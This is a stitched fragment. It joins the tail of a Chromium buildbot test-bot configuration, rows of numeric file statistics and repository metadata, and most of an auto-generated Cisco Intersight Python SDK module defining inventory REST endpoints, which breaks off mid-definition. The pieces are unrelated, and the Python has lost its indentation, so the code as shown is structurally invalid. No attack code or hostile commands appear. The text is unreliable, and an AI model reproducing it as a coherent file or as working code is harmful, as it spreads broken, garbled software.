'BUILD_CONFIG': 'Release',
'TARGET_BITS': 64,
},
'compile_targets': [
'blink_tests',
],
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(extra_args=[
'--additional-expectations',
'src/third_party/WebKit/LayoutTests/OilpanExpectations',
'--additional-expectations',
'src/third_party/WebKit/LayoutTests/LeakExpectations',
'--additional-expectations',
'src/third_party/WebKit/LayoutTests/OilpanLeakExpectations',
'--options=--enable-leak-detection',
]),
],
'testing': {
'platform': 'linux',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Linux non-Oilpan (dbg)': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb', 'oilpan'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Debug',
'TARGET_BITS': 64,
},
'compile_targets': [
'blink_tests',
],
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(extra_args=[
'--additional-expectations',
'src/third_party/WebKit/LayoutTests/OilpanExpectations',
]),
],
'testing': {
'platform': 'linux',
},
'enable_swarming': True,
'use_isolate': True,
},
})
| 26.490196
| 75
| 0.590282
| 2,217
| 22,967
| 5.802887
| 0.082544
| 0.059852
| 0.04897
| 0.060785
| 0.93012
| 0.924446
| 0.921726
| 0.914341
| 0.906646
| 0.905946
| 0
| 0.007323
| 0.244917
| 22,967
| 866
| 76
| 26.520785
| 0.734517
| 0.053555
| 0
| 0.803103
| 0
| 0
| 0.496984
| 0.125627
| 0
| 0
| 0
| 0.001155
| 0
| 1
| 0
| false
| 0
| 0.00358
| 0
| 0.00358
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
90d63e12f47d0704a8bb3f2147e42f2967dc2c51
| 95,425
|
py
|
Python
|
intersight/api/inventory_api.py
|
CiscoDevNet/intersight-python
|
04b721f37c3044646a91c185c7259edfb991557a
|
[
"Apache-2.0"
] | 5
|
2021-12-16T15:13:32.000Z
|
2022-03-29T16:09:54.000Z
|
intersight/api/inventory_api.py
|
CiscoDevNet/intersight-python
|
04b721f37c3044646a91c185c7259edfb991557a
|
[
"Apache-2.0"
] | 4
|
2022-01-25T19:05:51.000Z
|
2022-03-29T20:18:37.000Z
|
intersight/api/inventory_api.py
|
CiscoDevNet/intersight-python
|
04b721f37c3044646a91c185c7259edfb991557a
|
[
"Apache-2.0"
] | 2
|
2020-07-07T15:01:08.000Z
|
2022-01-31T04:27:35.000Z
|
"""
Cisco Intersight
Cisco Intersight is a management platform delivered as a service with embedded analytics for your Cisco and 3rd party IT infrastructure. This platform offers an intelligent level of management that enables IT organizations to analyze, simplify, and automate their environments in more advanced ways than the prior generations of tools. Cisco Intersight provides an integrated and intuitive management experience for resources in the traditional data center as well as at the edge. With flexible deployment options to address complex security needs, getting started with Intersight is quick and easy. Cisco Intersight has deep integration with Cisco UCS and HyperFlex systems allowing for remote deployment, configuration, and ongoing maintenance. The model-based deployment works for a single system in a remote location or hundreds of systems in a data center and enables rapid, standardized configuration and deployment. It also streamlines maintaining those systems whether you are working with small or very large configurations. The Intersight OpenAPI document defines the complete set of properties that are returned in the HTTP response. From that perspective, a client can expect that no additional properties are returned, unless these properties are explicitly defined in the OpenAPI document. However, when a client uses an older version of the Intersight OpenAPI document, the server may send additional properties because the software is more recent than the client. In that case, the client may receive properties that it does not know about. Some generated SDKs perform a strict validation of the HTTP response body against the OpenAPI document. # noqa: E501
The version of the OpenAPI document: 1.0.9-4950
Contact: intersight@cisco.com
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from intersight.api_client import ApiClient, Endpoint as _Endpoint
from intersight.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from intersight.model.error import Error
from intersight.model.inventory_device_info import InventoryDeviceInfo
from intersight.model.inventory_device_info_response import InventoryDeviceInfoResponse
from intersight.model.inventory_dn_mo_binding import InventoryDnMoBinding
from intersight.model.inventory_dn_mo_binding_response import InventoryDnMoBindingResponse
from intersight.model.inventory_generic_inventory import InventoryGenericInventory
from intersight.model.inventory_generic_inventory_holder import InventoryGenericInventoryHolder
from intersight.model.inventory_generic_inventory_holder_response import InventoryGenericInventoryHolderResponse
from intersight.model.inventory_generic_inventory_response import InventoryGenericInventoryResponse
from intersight.model.inventory_request import InventoryRequest
class InventoryApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def __create_inventory_request(
self,
inventory_request,
**kwargs
):
"""Create a 'inventory.Request' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_inventory_request(inventory_request, async_req=True)
>>> result = thread.get()
Args:
inventory_request (InventoryRequest): The 'inventory.Request' resource to create.
Keyword Args:
if_match (str): For methods that apply server-side changes, and in particular for PUT, If-Match can be used to prevent the lost update problem. It can check if the modification of a resource that the user wants to upload will not override another change that has been done since the original resource was fetched. If the request cannot be fulfilled, the 412 (Precondition Failed) response is returned. When modifying a resource using POST or PUT, the If-Match header must be set to the value of the resource ModTime property after which no lost update problem should occur. For example, a client send a GET request to obtain a resource, which includes the ModTime property. The ModTime indicates the last time the resource was created or modified. The client then sends a POST or PUT request with the If-Match header set to the ModTime property of the resource as obtained in the GET request.. [optional]
if_none_match (str): For methods that apply server-side changes, If-None-Match used with the * value can be used to create a resource not known to exist, guaranteeing that another resource creation didn't happen before, losing the data of the previous put. The request will be processed only if the eventually existing resource's ETag doesn't match any of the values listed. Otherwise, the status code 412 (Precondition Failed) is used. The asterisk is a special value representing any resource. It is only useful when creating a resource, usually with PUT, to check if another resource with the identity has already been created before. The comparison with the stored ETag uses the weak comparison algorithm, meaning two resources are considered identical if the content is equivalent - they don't have to be identical byte for byte.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
InventoryRequest
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['inventory_request'] = \
inventory_request
return self.call_with_http_info(**kwargs)
self.create_inventory_request = _Endpoint(
settings={
'response_type': (InventoryRequest,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/inventory/Requests',
'operation_id': 'create_inventory_request',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'inventory_request',
'if_match',
'if_none_match',
],
'required': [
'inventory_request',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'inventory_request':
(InventoryRequest,),
'if_match':
(str,),
'if_none_match':
(str,),
},
'attribute_map': {
'if_match': 'If-Match',
'if_none_match': 'If-None-Match',
},
'location_map': {
'inventory_request': 'body',
'if_match': 'header',
'if_none_match': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__create_inventory_request
)
def __get_inventory_device_info_by_moid(
self,
moid,
**kwargs
):
"""Read a 'inventory.DeviceInfo' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_inventory_device_info_by_moid(moid, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
InventoryDeviceInfo
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
return self.call_with_http_info(**kwargs)
self.get_inventory_device_info_by_moid = _Endpoint(
settings={
'response_type': (InventoryDeviceInfo,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/inventory/DeviceInfos/{Moid}',
'operation_id': 'get_inventory_device_info_by_moid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'moid',
],
'required': [
'moid',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
},
'attribute_map': {
'moid': 'Moid',
},
'location_map': {
'moid': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_inventory_device_info_by_moid
)
def __get_inventory_device_info_list(
    self,
    **kwargs
):
    """Read a 'inventory.DeviceInfo' resource. # noqa: E501
    Synchronous by default; pass async_req=True to make the request
    asynchronously, in which case a request thread is returned and the
    result is obtained via thread.get().
    >>> thread = api.get_inventory_device_info_list(async_req=True)
    >>> result = thread.get()
    Keyword Args:
        filter (str): OData-style $filter predicate selecting the subset of
            entries to return. [optional] if omitted the server will use the
            default value of ""
        orderby (str): Properties used to sort the returned collection. [optional]
        top (int): Maximum number of resources to return. [optional] if
            omitted the server will use the default value of 100
        skip (int): Number of resources to skip. [optional] if omitted the
            server will use the default value of 0
        select (str): Subset of properties to return. [optional] if omitted
            the server will use the default value of ""
        expand (str): Additional attributes or related resources to include
            with the primary resources. [optional]
        apply (str): One or more '/'-separated set transformations
            ("aggregate", "groupby") applied in order to aggregate the
            resources. [optional]
        count (bool): Return only the count of matching resources instead of
            the resources themselves. [optional]
        inlinecount (str): Request an inline count of matching resources to
            be included in the response. [optional] if omitted the server
            will use the default value of "allpages"
        at (str): Like "$filter", but matches against versioning-information
            properties of the resources. [optional]
        tags (str): Request a summary of Tag-key utilization for this
            resource. [optional]
        _return_http_data_only (bool): return only the response body,
            without status code and headers. Default is True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse without reading/decoding it.
            Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) timeout pair. Default is None.
        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute request asynchronously
    Returns:
        InventoryDeviceInfoResponse
        If the method is called asynchronously, returns the request
        thread.
    """
    # Fill in the standard call options only where the caller did not
    # supply them (same result as the repeated kwargs.get() pattern).
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    return self.call_with_http_info(**kwargs)
# Endpoint wrapper for GET /api/v1/inventory/DeviceInfos.
self.get_inventory_device_info_list = _Endpoint(
    settings={
        'response_type': (InventoryDeviceInfoResponse,),
        # NOTE(review): 'oAuth2' is listed twice in the generated spec;
        # preserved verbatim so auth handling is unchanged.
        'auth': ['cookieAuth', 'http_signature', 'oAuth2', 'oAuth2'],
        'endpoint_path': '/api/v1/inventory/DeviceInfos',
        'operation_id': 'get_inventory_device_info_list',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': [
            'filter', 'orderby', 'top', 'skip', 'select', 'expand',
            'apply', 'count', 'inlinecount', 'at', 'tags',
        ],
        'required': [],
        'nullable': [],
        'enum': ['inlinecount'],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {
            ('inlinecount',): {
                "ALLPAGES": "allpages",
                "NONE": "none"
            },
        },
        'openapi_types': {
            'filter': (str,),
            'orderby': (str,),
            'top': (int,),
            'skip': (int,),
            'select': (str,),
            'expand': (str,),
            'apply': (str,),
            'count': (bool,),
            'inlinecount': (str,),
            'at': (str,),
            'tags': (str,),
        },
        'attribute_map': {
            'filter': '$filter',
            'orderby': '$orderby',
            'top': '$top',
            'skip': '$skip',
            'select': '$select',
            'expand': '$expand',
            'apply': '$apply',
            'count': '$count',
            'inlinecount': '$inlinecount',
            'at': 'at',
            'tags': 'tags',
        },
        'location_map': {
            'filter': 'query',
            'orderby': 'query',
            'top': 'query',
            'skip': 'query',
            'select': 'query',
            'expand': 'query',
            'apply': 'query',
            'count': 'query',
            'inlinecount': 'query',
            'at': 'query',
            'tags': 'query',
        },
        'collection_format_map': {},
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_inventory_device_info_list
)
def __get_inventory_dn_mo_binding_by_moid(
    self,
    moid,
    **kwargs
):
    """Read a 'inventory.DnMoBinding' resource. # noqa: E501
    Synchronous by default; pass async_req=True to make the request
    asynchronously, in which case a request thread is returned and the
    result is obtained via thread.get().
    >>> thread = api.get_inventory_dn_mo_binding_by_moid(moid, async_req=True)
    >>> result = thread.get()
    Args:
        moid (str): The unique Moid identifier of a resource instance.
    Keyword Args:
        _return_http_data_only (bool): return only the response body,
            without status code and headers. Default is True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse without reading/decoding it.
            Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) timeout pair. Default is None.
        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute request asynchronously
    Returns:
        InventoryDnMoBinding
        If the method is called asynchronously, returns the request
        thread.
    """
    # Fill in the standard call options only where the caller did not
    # supply them (same result as the repeated kwargs.get() pattern).
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    kwargs['moid'] = moid
    return self.call_with_http_info(**kwargs)
# Endpoint wrapper for GET /api/v1/inventory/DnMoBindings/{Moid}.
self.get_inventory_dn_mo_binding_by_moid = _Endpoint(
    settings={
        'response_type': (InventoryDnMoBinding,),
        # NOTE(review): 'oAuth2' is listed twice in the generated spec;
        # preserved verbatim so auth handling is unchanged.
        'auth': ['cookieAuth', 'http_signature', 'oAuth2', 'oAuth2'],
        'endpoint_path': '/api/v1/inventory/DnMoBindings/{Moid}',
        'operation_id': 'get_inventory_dn_mo_binding_by_moid',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': ['moid'],
        'required': ['moid'],
        'nullable': [],
        'enum': [],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {'moid': (str,)},
        'attribute_map': {'moid': 'Moid'},
        'location_map': {'moid': 'path'},
        'collection_format_map': {},
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_inventory_dn_mo_binding_by_moid
)
def __get_inventory_dn_mo_binding_list(
    self,
    **kwargs
):
    """Read a 'inventory.DnMoBinding' resource. # noqa: E501
    Synchronous by default; pass async_req=True to make the request
    asynchronously, in which case a request thread is returned and the
    result is obtained via thread.get().
    >>> thread = api.get_inventory_dn_mo_binding_list(async_req=True)
    >>> result = thread.get()
    Keyword Args:
        filter (str): OData-style $filter predicate selecting the subset of
            entries to return. [optional] if omitted the server will use the
            default value of ""
        orderby (str): Properties used to sort the returned collection. [optional]
        top (int): Maximum number of resources to return. [optional] if
            omitted the server will use the default value of 100
        skip (int): Number of resources to skip. [optional] if omitted the
            server will use the default value of 0
        select (str): Subset of properties to return. [optional] if omitted
            the server will use the default value of ""
        expand (str): Additional attributes or related resources to include
            with the primary resources. [optional]
        apply (str): One or more '/'-separated set transformations
            ("aggregate", "groupby") applied in order to aggregate the
            resources. [optional]
        count (bool): Return only the count of matching resources instead of
            the resources themselves. [optional]
        inlinecount (str): Request an inline count of matching resources to
            be included in the response. [optional] if omitted the server
            will use the default value of "allpages"
        at (str): Like "$filter", but matches against versioning-information
            properties of the resources. [optional]
        tags (str): Request a summary of Tag-key utilization for this
            resource. [optional]
        _return_http_data_only (bool): return only the response body,
            without status code and headers. Default is True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse without reading/decoding it.
            Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) timeout pair. Default is None.
        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute request asynchronously
    Returns:
        InventoryDnMoBindingResponse
        If the method is called asynchronously, returns the request
        thread.
    """
    # Fill in the standard call options only where the caller did not
    # supply them (same result as the repeated kwargs.get() pattern).
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    return self.call_with_http_info(**kwargs)
# Endpoint wrapper for GET /api/v1/inventory/DnMoBindings.
self.get_inventory_dn_mo_binding_list = _Endpoint(
    settings={
        'response_type': (InventoryDnMoBindingResponse,),
        # NOTE(review): 'oAuth2' is listed twice in the generated spec;
        # preserved verbatim so auth handling is unchanged.
        'auth': ['cookieAuth', 'http_signature', 'oAuth2', 'oAuth2'],
        'endpoint_path': '/api/v1/inventory/DnMoBindings',
        'operation_id': 'get_inventory_dn_mo_binding_list',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': [
            'filter', 'orderby', 'top', 'skip', 'select', 'expand',
            'apply', 'count', 'inlinecount', 'at', 'tags',
        ],
        'required': [],
        'nullable': [],
        'enum': ['inlinecount'],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {
            ('inlinecount',): {
                "ALLPAGES": "allpages",
                "NONE": "none"
            },
        },
        'openapi_types': {
            'filter': (str,),
            'orderby': (str,),
            'top': (int,),
            'skip': (int,),
            'select': (str,),
            'expand': (str,),
            'apply': (str,),
            'count': (bool,),
            'inlinecount': (str,),
            'at': (str,),
            'tags': (str,),
        },
        'attribute_map': {
            'filter': '$filter',
            'orderby': '$orderby',
            'top': '$top',
            'skip': '$skip',
            'select': '$select',
            'expand': '$expand',
            'apply': '$apply',
            'count': '$count',
            'inlinecount': '$inlinecount',
            'at': 'at',
            'tags': 'tags',
        },
        'location_map': {
            'filter': 'query',
            'orderby': 'query',
            'top': 'query',
            'skip': 'query',
            'select': 'query',
            'expand': 'query',
            'apply': 'query',
            'count': 'query',
            'inlinecount': 'query',
            'at': 'query',
            'tags': 'query',
        },
        'collection_format_map': {},
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_inventory_dn_mo_binding_list
)
def __get_inventory_generic_inventory_by_moid(
    self,
    moid,
    **kwargs
):
    """Read a 'inventory.GenericInventory' resource. # noqa: E501
    Synchronous by default; pass async_req=True to make the request
    asynchronously, in which case a request thread is returned and the
    result is obtained via thread.get().
    >>> thread = api.get_inventory_generic_inventory_by_moid(moid, async_req=True)
    >>> result = thread.get()
    Args:
        moid (str): The unique Moid identifier of a resource instance.
    Keyword Args:
        _return_http_data_only (bool): return only the response body,
            without status code and headers. Default is True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse without reading/decoding it.
            Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) timeout pair. Default is None.
        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute request asynchronously
    Returns:
        InventoryGenericInventory
        If the method is called asynchronously, returns the request
        thread.
    """
    # Fill in the standard call options only where the caller did not
    # supply them (same result as the repeated kwargs.get() pattern).
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    kwargs['moid'] = moid
    return self.call_with_http_info(**kwargs)
# Endpoint wrapper for GET /api/v1/inventory/GenericInventories/{Moid}.
self.get_inventory_generic_inventory_by_moid = _Endpoint(
    settings={
        'response_type': (InventoryGenericInventory,),
        # NOTE(review): 'oAuth2' is listed twice in the generated spec;
        # preserved verbatim so auth handling is unchanged.
        'auth': ['cookieAuth', 'http_signature', 'oAuth2', 'oAuth2'],
        'endpoint_path': '/api/v1/inventory/GenericInventories/{Moid}',
        'operation_id': 'get_inventory_generic_inventory_by_moid',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': ['moid'],
        'required': ['moid'],
        'nullable': [],
        'enum': [],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {'moid': (str,)},
        'attribute_map': {'moid': 'Moid'},
        'location_map': {'moid': 'path'},
        'collection_format_map': {},
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_inventory_generic_inventory_by_moid
)
def __get_inventory_generic_inventory_holder_by_moid(
    self,
    moid,
    **kwargs
):
    """Read a 'inventory.GenericInventoryHolder' resource. # noqa: E501
    Synchronous by default; pass async_req=True to make the request
    asynchronously, in which case a request thread is returned and the
    result is obtained via thread.get().
    >>> thread = api.get_inventory_generic_inventory_holder_by_moid(moid, async_req=True)
    >>> result = thread.get()
    Args:
        moid (str): The unique Moid identifier of a resource instance.
    Keyword Args:
        _return_http_data_only (bool): return only the response body,
            without status code and headers. Default is True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse without reading/decoding it.
            Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) timeout pair. Default is None.
        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute request asynchronously
    Returns:
        InventoryGenericInventoryHolder
        If the method is called asynchronously, returns the request
        thread.
    """
    # Fill in the standard call options only where the caller did not
    # supply them (same result as the repeated kwargs.get() pattern).
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    kwargs['moid'] = moid
    return self.call_with_http_info(**kwargs)
# Endpoint wrapper for GET /api/v1/inventory/GenericInventoryHolders/{Moid}.
self.get_inventory_generic_inventory_holder_by_moid = _Endpoint(
    settings={
        'response_type': (InventoryGenericInventoryHolder,),
        # NOTE(review): 'oAuth2' is listed twice in the generated spec;
        # preserved verbatim so auth handling is unchanged.
        'auth': ['cookieAuth', 'http_signature', 'oAuth2', 'oAuth2'],
        'endpoint_path': '/api/v1/inventory/GenericInventoryHolders/{Moid}',
        'operation_id': 'get_inventory_generic_inventory_holder_by_moid',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': ['moid'],
        'required': ['moid'],
        'nullable': [],
        'enum': [],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {'moid': (str,)},
        'attribute_map': {'moid': 'Moid'},
        'location_map': {'moid': 'path'},
        'collection_format_map': {},
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_inventory_generic_inventory_holder_by_moid
)
def __get_inventory_generic_inventory_holder_list(
    self,
    **kwargs
):
    """Read a 'inventory.GenericInventoryHolder' resource. # noqa: E501
    Synchronous by default; pass async_req=True to make the request
    asynchronously, in which case a request thread is returned and the
    result is obtained via thread.get().
    >>> thread = api.get_inventory_generic_inventory_holder_list(async_req=True)
    >>> result = thread.get()
    Keyword Args:
        filter (str): OData-style $filter predicate selecting the subset of
            entries to return. [optional] if omitted the server will use the
            default value of ""
        orderby (str): Properties used to sort the returned collection. [optional]
        top (int): Maximum number of resources to return. [optional] if
            omitted the server will use the default value of 100
        skip (int): Number of resources to skip. [optional] if omitted the
            server will use the default value of 0
        select (str): Subset of properties to return. [optional] if omitted
            the server will use the default value of ""
        expand (str): Additional attributes or related resources to include
            with the primary resources. [optional]
        apply (str): One or more '/'-separated set transformations
            ("aggregate", "groupby") applied in order to aggregate the
            resources. [optional]
        count (bool): Return only the count of matching resources instead of
            the resources themselves. [optional]
        inlinecount (str): Request an inline count of matching resources to
            be included in the response. [optional] if omitted the server
            will use the default value of "allpages"
        at (str): Like "$filter", but matches against versioning-information
            properties of the resources. [optional]
        tags (str): Request a summary of Tag-key utilization for this
            resource. [optional]
        _return_http_data_only (bool): return only the response body,
            without status code and headers. Default is True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse without reading/decoding it.
            Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) timeout pair. Default is None.
        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute request asynchronously
    Returns:
        InventoryGenericInventoryHolderResponse
        If the method is called asynchronously, returns the request
        thread.
    """
    # Fill in the standard call options only where the caller did not
    # supply them (same result as the repeated kwargs.get() pattern).
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    return self.call_with_http_info(**kwargs)
# Endpoint wrapper for GET /api/v1/inventory/GenericInventoryHolders.
self.get_inventory_generic_inventory_holder_list = _Endpoint(
    settings={
        'response_type': (InventoryGenericInventoryHolderResponse,),
        # NOTE(review): 'oAuth2' is listed twice in the generated spec;
        # preserved verbatim so auth handling is unchanged.
        'auth': ['cookieAuth', 'http_signature', 'oAuth2', 'oAuth2'],
        'endpoint_path': '/api/v1/inventory/GenericInventoryHolders',
        'operation_id': 'get_inventory_generic_inventory_holder_list',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': [
            'filter', 'orderby', 'top', 'skip', 'select', 'expand',
            'apply', 'count', 'inlinecount', 'at', 'tags',
        ],
        'required': [],
        'nullable': [],
        'enum': ['inlinecount'],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {
            ('inlinecount',): {
                "ALLPAGES": "allpages",
                "NONE": "none"
            },
        },
        'openapi_types': {
            'filter': (str,),
            'orderby': (str,),
            'top': (int,),
            'skip': (int,),
            'select': (str,),
            'expand': (str,),
            'apply': (str,),
            'count': (bool,),
            'inlinecount': (str,),
            'at': (str,),
            'tags': (str,),
        },
        'attribute_map': {
            'filter': '$filter',
            'orderby': '$orderby',
            'top': '$top',
            'skip': '$skip',
            'select': '$select',
            'expand': '$expand',
            'apply': '$apply',
            'count': '$count',
            'inlinecount': '$inlinecount',
            'at': 'at',
            'tags': 'tags',
        },
        'location_map': {
            'filter': 'query',
            'orderby': 'query',
            'top': 'query',
            'skip': 'query',
            'select': 'query',
            'expand': 'query',
            'apply': 'query',
            'count': 'query',
            'inlinecount': 'query',
            'at': 'query',
            'tags': 'query',
        },
        'collection_format_map': {},
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_inventory_generic_inventory_holder_list
)
def __get_inventory_generic_inventory_list(
self,
